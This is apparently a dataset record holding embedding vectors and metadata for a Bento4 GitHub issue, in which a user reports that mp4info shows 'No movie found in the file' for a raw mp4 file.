0.029103882610797882, 0.0028421159368008375, 0.008683604188263416, 0.017704732716083527, 0.005208628252148628, -0.02704804576933384, 0.010770123451948166, 0.0042267367243766785, -0.013600733131170273, -0.003898800117895007, -0.007908830419182777, -0.020972590893507004, -0.003463469445705414, 0.0027232151478528976, -0.018349099904298782, -0.021279433742165565, -0.0040656449273228645, -0.013148142956197262, 0.0011075047077611089, 0.013117458671331406, 0.0070189908146858215, 0.0141683891415596, 0.01101559679955244, -0.0034212786704301834, 0.00125900749117136, 0.004295776132494211, -0.01266486756503582, 0.011636950075626373, -0.03338431566953659, -0.007011319976300001, 0.014567282982170582, -0.0004343719920143485, -0.014659334905445576, 0.013853877782821655, 0.03335363045334816, -0.003760721767321229, -0.0013213346246629953, 0.005549989175051451, 0.00017427618149667978, -0.008921406231820583, 0.00037132573197595775, -0.011767357587814331, 0.009926310740411282, -0.0064513348042964935, 0.017842812463641167, -0.0030645758379250765, -0.013140471652150154, 0.01968385837972164, 0.003386758966371417, -0.012058856897056103, -0.01482042670249939, -0.002803760813549161, -0.004104000050574541, -0.02483879029750824, -0.02350403182208538, 0.024900158867239952, -0.014375506900250912, 0.011299424804747105, 0.013884561136364937, -0.006336269434541464, 0.01198214665055275, -0.010816150344908237, -0.009673167020082474, -0.008698945865035057, -0.0031432039104402065, -0.010770123451948166, 0.004468373954296112, -0.0004849528195336461, -0.01629326492547989, 0.009519746527075768, 0.022859664633870125, -0.011506542563438416, 0.015081241726875305, -0.02991701103746891, -0.007252957206219435, 0.0015668075066059828, 0.01804225891828537, 0.0024297982454299927, 0.006712149828672409, -0.02964085340499878, -0.0011928449384868145, -0.0071340566501021385, -0.0007627878803759813, -0.0031412860844284296, -0.024746738374233246, 0.0004859117034357041, 0.01348566822707653, -0.006516538560390472, 0.014360165223479271, 0.019284965470433235, -0.003946743905544281, 0.011222714558243752, -0.009021129459142685, -0.021003276109695435, -0.015817660838365555, 0.00984192918986082, 0.01536506973206997, 0.015925055369734764, 0.008238684386014938, -0.01187475211918354, -0.005688067525625229, -0.00907482672482729, 0.01120737288147211, 0.00896743219345808, -0.014835769310593605, -0.0013999626971781254, -0.015786975622177124, 0.01758199743926525, -0.006225039716809988, 0.03065343014895916, 0.03283200040459633, 0.00447604525834322, -0.006393802352249622, 0.003977428190410137, 0.004990004003047943, 0.010171784088015556, 0.013232523575425148, -0.01543410960584879, -0.0059028565883636475, 0.02582068182528019, 0.00896743219345808, 0.026848599314689636, -0.001442153356038034, -0.010609032586216927, -0.006006415467709303, 0.009611798450350761, -0.00032913507311604917, 0.025022894144058228, -0.003375252475962043, -0.0028497870080173016, 0.01469769049435854, -0.002803760813549161, -0.023458003997802734, -0.014107021503150463, -0.010946557857096195, 0.02112601138651371, 0.010693413205444813, 0.006447499617934227, 0.017812127247452736, -0.0027922543231397867, 0.005385061725974083, -0.01231200061738491, 0.021202722564339638, -0.015602871775627136, 0.0018544711638242006, -0.01825704798102379, -0.00938933901488781, 0.0016972150187939405, 0.013654430396854877, 0.011529555544257164, -0.024271134287118912, 0.0036916823592036963, 0.00479822838678956, -0.006113809533417225, -0.01811896823346615, -0.0005130000063218176, -0.0024317160714417696, -0.010003020986914635, -0.0030147142242640257, -0.007268299348652363, -0.029364697635173798, -0.032249003648757935, -0.002732803812250495, 0.004836583510041237, 0.009657824411988258, -0.0035823702346533537, 0.024884816259145737, -0.01543410960584879, -0.00648201908916235, -0.013470325618982315, -0.022230640053749084, -0.004552755504846573, -0.007947185076773167, -0.0081773167476058, 0.025452472269535065, -0.03366047143936157, -0.014858782291412354, -0.02644970640540123, 0.021172039210796356, 0.008599222637712955, -0.010110415518283844, 0.00009043423051480204, -0.010961899533867836, -0.01646202616393566, -0.011046281084418297, 0.012242961674928665, -0.0007642261916771531, -0.005806968547403812, 0.007709383498877287, -0.01695297285914421, -0.016998998820781708, 0.007625002413988113, 0.012020501308143139, -0.01509658433496952, 0.0028421159368008375, 0.010869847610592842, -0.016093818470835686, -0.00566505454480648, -0.014705361798405647, -0.022921033203601837, -0.024409212172031403, -0.016830235719680786, 0.0010691495845094323, 0.0034059365279972553, 0.012235290370881557, -0.009665495716035366, -0.001883237506262958, -0.009818916209042072, 0.016738183796405792, 0.008683604188263416, 0.02554452419281006, 0.0034212786704301834, 0.008269368670880795, 0.0010125756962224841, 0.01521932054311037, -0.02623491734266281, -0.004376321565359831, -0.02091122418642044, -0.005592179950326681, -0.007751574274152517, 0.004928635898977518, -0.0004494743188843131, 0.003595794551074505, 0.029717564582824707, -0.013531694188714027, -0.0010883271461352706, 0.0000939700985327363, 0.00416920380666852, -0.02672586217522621, 0.00017475562344770879, 0.012848972342908382, 0.010693413205444813, -0.009258931502699852, 0.00747158145532012, -0.0034845646005123854, -0.0009195645106956363, -0.005879843141883612, 0.0009013458620756865, -0.0037281198892742395, -0.03387526050209999, -0.03026987798511982, -0.01965317502617836, 0.010516979731619358, -0.02308979630470276, 0.0055001275613904, -0.005177943967282772, 0.02098793350160122, -0.00044899489148519933, -0.005480949766933918, 0.008514841087162495, -0.00019429276289884, 0.0021210394334048033, -0.0015370823675766587, 0.012802946381270885, 0.0036571628879755735, 0.006777353584766388, 0.003879622556269169, -0.0030933422967791557, -0.02246077172458172, 0.011023268103599548, -0.01017945446074009, -0.004552755504846573, -0.005918198265135288, 0.0005666972137987614, -0.002590889809653163, -0.0056458767503499985, -0.00007227547030197456, 0.007521443534642458, -0.020328225567936897, -0.02999372035264969, 0.005642041563987732, -0.0038738693110644817, 0.012250632047653198, 0.00691926758736372, -0.01733652502298355, -0.003885375801473856, -0.013708127662539482, -0.009166878648102283, -0.007176246959716082, 0.016554079949855804, 0.014682348817586899, -0.0014968094183132052, -0.017919521778821945, -0.007168576121330261, -0.03073013946413994, 0.03703572601079941, 0.0035114132333546877, 0.009021129459142685, -0.019607149064540863, 0.0032429273705929518, 0.010915873572230339, -0.015395754016935825, 0.0025467814411967993, -0.012097211554646492, 0.008123619481921196, 0.006600920110940933, -0.019330991432070732, 0.0037166131660342216, 0.02756967581808567, 0.002023233799263835, 0.0014037982327863574, 0.004978497512638569, 0.011598595418035984, 0.004341802094131708, 0.01706036739051342, 0.015817660838365555, -0.005534647032618523, 0.016201211139559746, 0.005135753657668829, -0.005062878597527742, -0.008806340396404266, -0.016369974240660667, 0.0023032263852655888, 0.011383806355297565, -0.008837024681270123, -0.027278177440166473, -0.002471989020705223, 0.004947813227772713, 0.015925055369734764, 0.01068574283272028, -0.007364187389612198, 0.011836396530270576, -0.001093121594749391, 0.007655686233192682, -0.0005748476833105087, -0.009373996406793594, -0.008606893941760063, -0.002234186977148056, 0.002884306712076068, -0.004184545949101448, -0.004533577710390091, -0.019637832418084145, -0.007751574274152517, -0.014835769310593605, 0.003988934680819511, -0.029579484835267067, 0.013876890763640404, -0.03455031290650368, 0.021494220942258835, -0.0002294117002747953, -0.003189230104908347, -0.014252770692110062, -0.009811244904994965, -0.006708314176648855, 0.013784837909042835, -0.04019618779420853, 0.005120411515235901, -0.024762079119682312, -0.029057854786515236, 0.025805339217185974, 0.0025659590028226376, 0.0005700532929040492, 0.0026925308629870415, -0.004395499359816313, -0.004403170198202133, -0.010332874953746796, -0.00907482672482729, -0.006493525579571724, 0.016768869012594223, 0.010309861972928047, -0.024332502856850624, 0.014559611678123474, -0.009373996406793594, -0.034734416753053665, 0.002230351557955146, 0.006121480837464333, -0.03384457901120186, 0.006501196417957544, 0.0022456934675574303, -0.0166001059114933, 0.011713660322129726, 0.0042881048284471035, -0.013976613990962505, -0.004648643080145121, 0.024286476895213127, -0.0033656638115644455, 0.00915920827537775, -0.0026349981781095266, 0.0007321037701331079, 0.0005700532929040492, -0.00982658751308918, -0.021202722564339638, -0.001812280504964292, 0.016630789265036583, -0.006773517932742834, -0.000019701958080986515, 0.0023262393660843372, 0.00275389919988811, -0.023074453696608543, 0.023810872808098793, 0.0044913869351148605, 0.027416255325078964, 0.006505032069981098, 0.00589518528431654, 0.0009214822784997523, -0.007502265740185976, 0.002541028195992112, -0.000060409347497625276, 0.008146632462739944, -0.008046909235417843, 0.00208460190333426, -0.01643134281039238, 0.0013433888088911772, -0.023810872808098793, 0.016093818470835686, 0.003965921700000763, -0.0025755479000508785, -0.015211649239063263, 0.0018257048213854432, 0.02494618482887745, -0.001266678562387824, -0.003827843116596341, -0.016876261681318283, -0.0021363813430070877, 0.026188891381025314, 0.019146887585520744, 0.009972336702048779, -0.007625002413988113, -0.005116575863212347, -0.012365697883069515, -0.01597108133137226, 0.012825959362089634, 0.005998744163662195, 0.0036514096427708864, 0.010900530964136124, 0.013930588029325008, 0.008913734927773476, 0.004015783313661814, -0.012971709482371807, 0.008507170714437962, -0.01045561209321022, 0.008714288473129272, -0.0017931029433384538, 0.005285338498651981, 0.005392733030021191, 0.013754153624176979, -0.013723470270633698, -0.005546153523027897, 0.0018573477864265442, -0.018548546358942986, 0.002521850634366274, -0.019607149064540863, 0.00018877921684179455, 0.0028286916203796864, -0.0023166504688560963, 0.023197190836071968, 0.008154302835464478, -0.011084635742008686, 0.01850252039730549, 0.016738183796405792, 0.010294520296156406, -0.008898393251001835, 0.004844254348427057, 0.0052546546794474125, 0.001487220637500286, -0.00216322997584939, -0.0025640411768108606, -0.010463282465934753, 0.0012436654651537538, -0.003091424470767379, -0.014973847195506096, 0.017888838425278664, 0.01733652502298355, 0.008514841087162495, 0.022798296064138412, 0.014551941305398941, -0.009427693672478199, 0.01716776192188263, 0.01191310677677393, -0.010095073841512203, 0.0020558356773108244, 0.011537226848304272, 0.000007322685632971115, 0.006681465543806553, -0.019392360001802444, 0.004407005850225687, 0.0036533272359520197, 0.0006151205743663013, 0.0129640381783247, -0.024409212172031403, -0.007770751602947712, 0.00810827687382698, -0.006313256453722715, 0.000702378514688462, 0.011391477659344673, -0.023166505619883537, 0.020619723945856094, 0.023289242759346962, 0.01459029596298933, -0.02000604197382927, -0.006056277081370354, 0.014421533793210983, 0.0017844729591161013, 0.008131289854645729, -0.0076058246195316315, -0.005135753657668829, 0.0025448636151850224, 0.005856830161064863, -0.006566400174051523, -0.003275529248639941, -0.002648422494530678, 0.00021107314387336373, 0.007145563140511513, -0.016400659456849098, -0.008668262511491776, 0.026756547391414642, 0.0053773908875882626, 0.039705242961645126, 0.006942280568182468, 0.01380018051713705, -0.01814965344965458, 0.014544270001351833, 0.000601696316152811, -0.026633810251951218, 0.013539365492761135, 0.010317533276975155, 0.0006755299400538206, 0.010332874953746796, -0.008384434506297112, -0.021079985424876213, 0.017566654831171036, -0.008123619481921196, 0.009366326034069061, 0.011966804042458534, 0.006466676946729422, 0.017566654831171036, 0.01037123054265976, 0.009987679310142994, 0.009435364976525307, 0.0068962546065449715, 0.005231641232967377, 0.004414676688611507, -0.009734534658491611, 0.0029878655914217234, 0.03369115665555, -0.0346730500459671, 0.015157951973378658, -0.004268927499651909, 0.025206999853253365, -0.015418766997754574, -0.006244217045605183, 0.023780187591910362, -0.03166600689291954, -0.009343313053250313, -0.02109532803297043, -0.0000053712183216703124, 0.0033618281595408916, -0.005258489865809679, 0.017735417932271957, 0.0069576227106153965, 0.007298983633518219, 0.020972590893507004, -0.009350983425974846, 0.01264952588826418, 0.004387828055769205, -0.0024010317865759134, -0.013155813328921795, -0.013723470270633698, 0.0007071729050949216, -0.000012712632269540336, -0.029732905328273773, -0.012680210173130035, -0.019668517634272575, 0.025038236752152443, 0.015633555129170418, 0.013339918106794357, -0.028214043006300926, -0.01818033680319786, 0.0038585274014621973, -0.004341802094131708, 0.002460482297465205, 0.0017489944584667683, 0.021218065172433853, -0.0027692413423210382, -0.0008965514716692269, -0.0022725421003997326, 0.003684011287987232, 0.02385689876973629, 0.004587274976074696, -0.008606893941760063, -0.013547035865485668, 0.0043839928694069386, 0.0071187145076692104, 0.026219574734568596, -0.003988934680819511, 0.009366326034069061, 0.009435364976525307, 0.004391663707792759, -0.006838721688836813, -0.01656942069530487, -0.008729630149900913, 0.004061809740960598, -0.002213091589510441, -0.019913990050554276, 0.010095073841512203, -0.03734256699681282, 0.013431970961391926, 0.004675491712987423, -0.024501264095306396, 0.0006299832020886242, -0.002151723485440016, 0.003622643183916807, 0.00006520374154206365, -0.0010902449721470475, -0.0021210394334048033, 0.02259884960949421, -0.009458377957344055, -0.04381691291928291, 0.01572560891509056, 0.015296030789613724, -0.00216322997584939, 0.016109159216284752, -0.011744344606995583, 0.0028363626915961504, -0.008668262511491776, -0.006416815333068371, 0.006696807686239481, 0.004219065420329571, -0.008660591207444668, -0.0014977683313190937, 0.004859596490859985, 0.00809293519705534, -0.006827215198427439, -0.0029782766941934824, 0.022261325269937515, 0.0006165588856674731, -0.00648968992754817, 0.0029437572229653597, 0.021662984043359756, -0.009550430811941624, 0.004844254348427057, -0.0035900413058698177, -0.011215043254196644, 0.005208628252148628, -0.023841556161642075, -0.020589040592312813, -0.011775028891861439, -0.012204606086015701, 0.011813383549451828, -0.013746483251452446, -0.000975179485976696, 0.00010691495845094323, -0.02210790477693081, -0.004111671354621649, -0.01007205992937088, 0.011798041872680187, 0.0006961458129808307, 0.005212463904172182, 0.005438758991658688, -0.0025678768288344145, 0.01702968217432499, -0.005841488018631935, 0.0009699056390672922, 0.004107835702598095, 0.01488946657627821, -0.017397891730070114, 0.009711521677672863, -0.0018688542768359184, 0.01222761906683445, 0.01446755975484848, -0.01758199743926525, -0.013930588029325008, 0.026158206164836884, -0.002613903023302555, -0.025697944685816765, -0.009113181382417679, -0.018901413306593895, 0.014206744730472565, -0.0027097908314317465, 0.018471837043762207, 0.0010710672941058874, -0.005204792600125074, 0.0016847496153786778, 0.025375762954354286, 0.01427578367292881, 0.017474602907896042, -0.00947372056543827, -0.004456867463886738, 0.0016732431249693036, 0.026756547391414642, -0.0008735383744351566, 0.016201211139559746, 0.02074246108531952, -0.006286407820880413, 0.006827215198427439, 0.012219948694109917, -0.005956553388386965, 0.02308979630470276, -0.011636950075626373, -0.008622235618531704, 0.010171784088015556, -0.0004547481657937169, -0.0055039627477526665, 0.024577975273132324, -0.00020364183001220226, 0.0027136262506246567, 0.013884561136364937, 0.014352493919432163, 0.001081614987924695, 0.008806340396404266, -0.0027884189039468765, 0.0022169272415339947, 0.012695551849901676, -0.014122363179922104, -0.013876890763640404, 0.0017509122844785452, 0.005975731182843447, 0.003758803941309452, -0.007172411773353815, 0.01607847586274147, 0.0007110084407031536, -0.016247238963842392, -0.007475417107343674, -0.006712149828672409, -0.00530835147947073, 0.014551941305398941, -0.00015581776096951216, 0.02063506655395031, 0.014444546774029732, 0.013385944999754429, -0.0070841945707798, -0.004548919852823019, 0.010877517983317375, 0.0027673235163092613, 0.011345450766384602, -0.027983911335468292, -0.0256826039403677, -0.03513330966234207, -0.010655058547854424, -0.003743461798876524, -0.002744310535490513, -0.010064389556646347, 0.0018918673740699887, -0.00854552537202835, -0.004840419162064791, -0.011890093795955181, -0.0020040562376379967, 0.027554333209991455, -0.005246983375400305, 0.0033426505979150534, 0.0052546546794474125, 0.020052067935466766, -0.036728885024785995, 0.01776610128581524, -0.0095274168998003, 0.022967059165239334, 0.007993211969733238, -0.019070176407694817, -0.0072606285102665424, 0.011046281084418297, -0.006528045050799847, -0.015403425320982933, -0.0019004972418770194, -0.002803760813549161, 0.025621235370635986, 0.021570932120084763, 0.001655024359934032, -0.008461144752800465, 0.0013424300123006105, -0.011698318645358086, 0.011798041872680187, 0.013217181898653507, 0.0006870364886708558, 0.027661727741360664, -0.0018966618226841092, -0.009818916209042072, 0.007164740469306707, 0.00947372056543827, 0.011268740519881248, -0.0026867776177823544, 0.023734161630272865, -0.011867080815136433, -0.00416920380666852, -0.019576463848352432, -0.009880284778773785, 0.00895209051668644, 0.009397009387612343, 0.013501009903848171, 0.018441151827573776, -0.020082753151655197, 0.0048749386332929134, 0.00919756293296814, -0.004460703115910292, -0.023488689213991165, -0.021939141675829887, 0.007632673252373934, -0.01790418103337288, -0.004836583510041237, -0.015863686800003052, -0.009420023299753666, -0.009350983425974846, -0.007954856380820274, -0.013984284363687038, 0.00021898388513363898, -0.015679582953453064, 0.005388897377997637, -0.003829760942608118, 0.022614192217588425, 0.03534809872508049, -0.008829353377223015, -0.003935237415134907, -0.013853877782821655, 0.015211649239063263, -0.010187125764787197, 0.009987679310142994, -0.032003529369831085, 0.0024892487563192844, 0.0021133683621883392, 0.014912479557096958, 0.011813383549451828, 0.008131289854645729, 0.004844254348427057, -0.003747297450900078, 0.00020364183001220226, 0.00877565611153841, -0.003323473036289215, 0.011813383549451828, 0.011076965369284153, 0.00991096906363964, 0.00577244907617569, -0.012288987636566162, 0.002180489944294095, -0.009067155420780182, -0.0015351645415648818, 0.021877773106098175, -0.011844067834317684, 0.030638087540864944, 0.016170527786016464, -0.00041783132473938167, 0.019806595519185066, 0.011406819336116314, 0.0016742019215598702, 0.00021886403555981815, 0.0006879953434690833, 0.0027692413423210382, 0.007003649137914181, 0.01801157556474209, 0.0003715654311235994, -0.018349099904298782, 0.015372741036117077, 0.002504590665921569, -0.009443036280572414, 0.00420372374355793, 0.013140471652150154, -0.011146004311740398, 0.004982333164662123, -0.015687253326177597, 0.009734534658491611, 0.025759313255548477, 0.004771379753947258, -0.0003902635653503239, -0.02126409113407135, 0.0016022860072553158, 0.03706640750169754, -0.015510819852352142, 0.005534647032618523, -0.020052067935466766, 0.012273645028471947, -0.018625257536768913, -0.020788487046957016, 0.027523649856448174, -0.007007484324276447, 0.01101559679955244, 0.0006021757144480944, -0.00405413843691349, -0.010317533276975155, -0.007774587254971266, 0.010033705271780491, 0.005814639385789633, 0.008929077535867691, 0.01026383601129055, -0.026434363797307014, 0.010225481353700161, 0.0027711589355021715, -0.026787230744957924, 0.0010077813640236855, 0.0037146955728530884, 0.005108905024826527, -0.0005340953357517719, -0.007279805839061737, 0.002406785264611244, 0.009941652417182922, 0.004057974088937044, -0.009956995025277138, 0.008553196676075459, -0.01143750362098217, 0.001235035597346723, -0.020159462466835976, -0.017183104529976845, -0.019116202369332314, -0.00004500736031332053, 0.00790115911513567, 0.0015361234545707703, -0.018993467092514038, 0.0140686659142375, 0.002600478706881404, 0.004790557082742453, 0.010601361282169819, -0.010401914827525616, -0.005250819027423859, -0.001918716006912291, -0.03451962769031525, 0.008039237931370735, 0.0022629534360021353, 0.018609914928674698, -0.006554893683642149, 0.007153233978897333, 0.005369720049202442, 0.02232269197702408, -0.014206744730472565, -0.0025755479000508785, 0.005039865616708994, -0.0070995367132127285, 0.010202467441558838, 0.014620980247855186, 0.006175178103148937, 0.019714543595910072, 0.013639088720083237, 0.0190548337996006, -0.011153675615787506, -0.004107835702598095, 0.010670400224626064, 0.010678071528673172, 0.0038815403822809458, -0.0033560749143362045, -0.01037123054265976, -0.001075861742720008, 0.005841488018631935, -0.004134684335440397, -0.02038959413766861, -0.0025621235836297274, 0.010355887934565544, 0.021923799067735672, -0.010486295446753502, 0.003925648983567953, 0.005553824361413717, 0.016722841188311577, 0.0020328224636614323, 0.0056458767503499985, -0.007832120172679424, 0.009067155420780182, -0.011268740519881248, 0.0022898020688444376, -0.021524906158447266, -0.004176875110715628, -0.025375762954354286, 0.0007182000554166734, 0.008376763202250004, 0.013646760024130344, -0.02571328729391098, 0.018901413306593895, -0.016017107293009758, -0.028045279905200005, 0.01615518517792225, -0.004721518140286207, 0.021816404536366463, 0.018272390589118004, -0.006439828313887119, 0.020236173644661903, 0.024424554780125618, -0.0005964224692434072, 0.009987679310142994, -0.021172039210796356, 0.0047483667731285095, -0.017351865768432617, -0.0017911851173266768, 0.02101861871778965, -0.012764591723680496, -0.00393140222877264, 0.0059642246924340725, -0.03464236482977867, -0.009136195294559002, 0.005135753657668829, 0.01438317820429802, 0.010171784088015556, 0.013370602391660213, -0.007694041356444359, 0.0028651291504502296, -0.009772890247404575, 0.010302191600203514, 0.008852366358041763, 0.011107648722827435, 0.005722586996853352, 0.006462841294705868, 0.005852994509041309, -0.0043072826229035854, -0.01695297285914421, 0.05857597291469574, 0.0006290243472903967, 0.023872241377830505, -0.0029955366626381874, -0.010770123451948166, 0.006474347785115242, -0.005415746010839939, -0.012941025197505951, -0.009619469754397869, 0.023780187591910362, -0.0003761201223824173, -0.004882609471678734, 0.003018549643456936, -0.002611985197290778, 0.012411723844707012, -0.002464317949488759, 0.0024854131042957306, 0.0010240823030471802, -0.007962527684867382, -0.021801061928272247, -0.027140097692608833, -0.0002845472190529108, 0.032034214586019516, -0.027063388377428055, -0.0031949833501130342, -0.004963155370205641, -0.000039134229155024514, -0.022936375811696053, -0.00028574580210261047, -0.015648897737264633, 0.022690901532769203, -0.022936375811696053, 0.01755131222307682, 0.0027654056902974844, -0.004802063573151827, 0.0077630807645618916, 0.014291126281023026, 0.019883304834365845, -0.010716427117586136, -0.010118086822330952, 0.008315394632518291, 0.01804225891828537, -0.019315648823976517, 0.012181593105196953, 0.00361688993871212, -0.0010806560749188066, -0.013915245421230793, 0.005143424496054649, -0.0014133870135992765, 0.005120411515235901, 0.017397891730070114, 0.003081835573539138, -0.00031427244539372623, 0.0009075785637833178, -0.0005158766871318221, -0.02284432202577591, -0.0005072467611171305, -0.017290497198700905, 0.0024202095810323954, -0.02620423398911953, -0.0005077262176200747, -0.02003672532737255, -0.007176246959716082, -0.0038067479617893696, -0.018763335421681404, -0.017351865768432617, -0.0070995367132127285, 0.00750610139220953, -0.010754781775176525, 0.0207731444388628, 0.010041376575827599, -0.00112092902418226, -0.011606265790760517, -0.0016799552831798792, -0.003091424470767379, -0.01266486756503582, 0.003816336626186967, -0.017290497198700905, 0.008046909235417843, -0.007816777564585209, -0.01632394827902317, -0.0021958318538963795, 0.00038283225148916245, 0.00011830164294224232, 0.007552127353847027, -0.0036533272359520197, 0.004376321565359831, -0.007563633844256401, -0.014206744730472565, 0.03255584463477135, 0.015817660838365555, -0.0019388524815440178, -0.018471837043762207, -0.004894115962088108, 0.01373114064335823, -0.015065900050103664, -0.01615518517792225, -0.012350356206297874, -0.008959760889410973, 0.010754781775176525, 0.003745379624888301, 0.005549989175051451, -0.022537481039762497, -0.0018151571275666356, -0.0013625663705170155, -0.008806340396404266, 0.007694041356444359, -0.005212463904172182, -0.01919291354715824, -0.005001510493457317, 0.0033426505979150534, -0.007801435887813568, -0.01198214665055275, -0.009872613474726677, 0.020297540351748466, 0.009926310740411282, 0.010662729851901531, 0.002251446945592761, 0.01005671825259924, 0.010724097490310669, 0.001944605726748705, -0.0074792527593672276, 0.031481899321079254, 0.014245099388062954, 0.010938886553049088, 0.0007623084238730371, 0.0020385757088661194, 0.007736232131719589, -0.00107969727832824, 0.010678071528673172, -0.0021229570265859365, -0.01383853517472744, 0.03519468009471893, 0.005899020936340094, -0.003988934680819511, 0.011537226848304272, -0.018379783257842064, 0.01702968217432499, 0.016968315467238426, 0.0008361421059817076, -0.003375252475962043, 0.029963036999106407, 0.005511634051799774, 0.008599222637712955, -0.009443036280572414, 0.006136822514235973, 0.005216299556195736, 0.006505032069981098, -0.008392104879021645, -0.020021384581923485, 0.025314394384622574, 0.006194355431944132, 0.006056277081370354, 0.007939514704048634, 0.005411910358816385, 0.002897731028497219, 0.004460703115910292, 0.011552568525075912, -0.03197284787893295, -0.006290243472903967, -0.0007225149893201888, 0.010102744214236736, 0.0019043327774852514, -0.007371858227998018, 0.01521932054311037, 0.018763335421681404, -0.00013783879694528878, -0.009266601875424385, 0.030960271134972572, -0.01308677438646555, -0.02178572118282318, -0.010908202268183231, -0.00011434626503614709, -0.011307096108794212, 0.00518561527132988, 0.016753526404500008, 0.018732652068138123, 0.011644621379673481, 0.018103627488017082, 0.01741323433816433, 0.014835769310593605, 0.007172411773353815, 0.004909458104521036, 0.03019316866993904, 0.03209558129310608, -0.007855133153498173, -0.015395754016935825, -0.010854505002498627, 0.013117458671331406, 0.00034855236299335957, -0.000831347715575248, -0.01017945446074009, 0.017045024782419205, -0.00854552537202835, 0.0009109346428886056, 0.013639088720083237, 0.03341500088572502, -0.0007100495859049261, 0.014444546774029732, -0.01175201591104269, 0.003553604008629918, -0.021248748525977135, -0.014628651551902294, 0.015150281600654125 ]
268
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
I have mp4 file (raw). mp4info doesn't show any information about the file. "No movie found in the file" https://www49.zippyshare.com/v/GZ7021Ov/file.html
mp4info doesn't show info
https://api.github.com/repos/axiomatic-systems/Bento4/issues/632/comments
0
2021-08-01T13:49:29
2021-08-02T12:47:34Z
https://github.com/axiomatic-systems/Bento4/issues/632
957,497,106
632
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : mp4info doesn't show info Issue date: --- start body --- I have mp4 file (raw). mp4info doesn't show any information about the file. "No movie found in the file" https://www49.zippyshare.com/v/GZ7021Ov/file.html --- end body ---
302
[ -0.020216774195432663, 0.025445250794291496, -0.007474039681255817, -0.010296076536178589, 0.01724056527018547, 0.01701265759766102, 0.0005081844283267856, 0.05488559231162071, -0.01879570074379444, 0.031799860298633575, -0.008720830082893372, 0.012836579233407974, -0.001985815353691578, 0.017093095928430557, 0.0007281323196366429, 0.0075879935175180435, -0.026155786588788033, 0.005654127802699804, -0.0052619921043515205, 0.01620827615261078, 0.05244563892483711, 0.006394828669726849, 0.01716012693941593, 0.03767184168100357, -0.002354490105062723, -0.00472573796287179, -0.04705628380179405, 0.013144925236701965, -0.020659184083342552, -0.017870662733912468, 0.020833466202020645, 0.009806744754314423, -0.011475834995508194, 0.009156536310911179, 0.0454743355512619, 0.0335426852107048, 0.03547320142388344, 0.02326001599431038, -0.01261537428945303, 0.040513988584280014, -0.01823263429105282, -0.035714514553546906, -0.016744529828429222, 0.022911449894309044, -0.03676020726561546, 0.016449591144919395, 0.010617827996611595, -0.012849985621869564, -0.028957713395357132, -0.00005572013833443634, 0.00541951647028327, 0.019479425624012947, -0.013319207355380058, -0.02917221561074257, -0.0232332032173872, -0.000047367353545269, 0.013037674129009247, -0.00024194270372390747, -0.02162444032728672, 0.04394601285457611, -0.031049104407429695, 0.004236406181007624, 0.024640869349241257, 0.04874548688530922, 0.010772001929581165, -0.004662057850509882, 0.007762276101857424, 0.027697516605257988, -0.011335068382322788, 0.01804494671523571, -0.017776818946003914, 0.010235747322440147, 0.027912018820643425, 0.01846054196357727, 0.01016201265156269, -0.03474925830960274, 0.02551228180527687, 0.01300415862351656, -0.006136756390333176, 0.02639710158109665, -0.042015496641397476, 0.03370356187224388, -0.07003476470708847, 0.02595469169318676, 0.002394709037616849, 0.015564771369099617, -0.023112546652555466, -0.059309687465429306, -0.039655979722738266, -0.0025304483715444803, 0.06408234685659409, -0.0077153537422418594, 0.03938785195350647, 0.002141664270311594, 0.008955441415309906, -0.014948079362511635, 0.030512850731611252, -0.00494023971259594, -0.044267766177654266, -0.03882478550076485, -0.012749438174068928, -0.02429230511188507, 0.0160473994910717, -0.03555363789200783, -0.007313163485378027, -0.0005119549459777772, 0.01336613018065691, -0.04340975731611252, 0.013104706071317196, 0.0727696642279625, 0.008955441415309906, 0.008137653581798077, -0.03627758100628853, -0.014492263086140156, 0.018742075189948082, 0.0656374841928482, -0.027241701260209084, -0.03131723031401634, -0.0005676751025021076, -0.014827421866357327, -0.027000386267900467, -0.026745665818452835, -0.02356836199760437, 0.007360085844993591, -0.015444113872945309, 0.07877570390701294, -0.015886522829532623, 0.00878786202520132, -0.008928628638386726, -0.031826671212911606, -0.04879910871386528, 0.00439393101260066, 0.004846394993364811, -0.0030197801534086466, -0.024962622672319412, -0.006592572201043367, -0.06359972059726715, 0.02559272013604641, -0.023997364565730095, -0.012849985621869564, -0.03764502704143524, -0.027107637375593185, 0.018675044178962708, 0.021450158208608627, -0.014465450309216976, -0.016422778367996216, -0.02151719108223915, -0.015149174258112907, -0.003834215924143791, 0.004648651462048292, 0.006394828669726849, -0.03933422639966011, 0.015564771369099617, -0.00030855549266561866, 0.046091027557849884, 0.026960168033838272, 0.024359336122870445, 0.008901815861463547, -0.029547592625021935, -0.025472063571214676, -0.002212047576904297, -0.026665227487683296, 0.025793815031647682, -0.02764389105141163, 0.0167713426053524, -0.03517825901508331, 0.005178202409297228, -0.008740939199924469, 0.006056318059563637, 0.021838942542672157, -0.004075529985129833, -0.023635393008589745, -0.0035861984360963106, 0.008915222249925137, -0.012293621897697449, -0.020605558529496193, 0.02151719108223915, 0.051399942487478256, -0.016328932717442513, -0.00452464260160923, -0.017522098496556282, -0.011844509281218052, 0.00264440244063735, -0.03378399834036827, -0.00004498458656598814, -0.015645209699869156, 0.055395033210515976, -0.02126246877014637, 0.013942603021860123, -0.008197982795536518, 0.016449591144919395, 0.014250949025154114, -0.007768979296088219, -0.03759140148758888, 0.043570633977651596, 0.004554807208478451, -0.01998886652290821, -0.04110386595129967, -0.03356949985027313, 0.03373037278652191, 0.01724056527018547, -0.007742166519165039, 0.016007181257009506, -0.0064585087820887566, 0.0011068617459386587, 0.030995478853583336, -0.025914473459124565, 0.039709605276584625, 0.013929196633398533, -0.03544638678431511, -0.04142561927437782, -0.031209981068968773, 0.01335272379219532, 0.027912018820643425, 0.00984026025980711, 0.021222250536084175, -0.02073962241411209, 0.006119998171925545, -0.02981572039425373, -0.004970403853803873, -0.0038844896480441093, -0.013982822187244892, 0.01801813393831253, -0.019801177084445953, -0.036492083221673965, -0.006371367257088423, -0.014760389924049377, -0.0038543252740055323, 0.033435434103012085, 0.005409461911767721, 0.03142448142170906, 0.024667682126164436, -0.01862141862511635, 0.008405780419707298, -0.0039984434843063354, -0.005952418781816959, 0.0007562018581666052, -0.04710990935564041, 0.004279976710677147, -0.00938444398343563, -0.0028002511244267225, 0.04799472913146019, -0.019586676731705666, 0.02175850421190262, 0.01126803644001484, 0.019171079620718956, -0.004015201702713966, -0.032711490988731384, 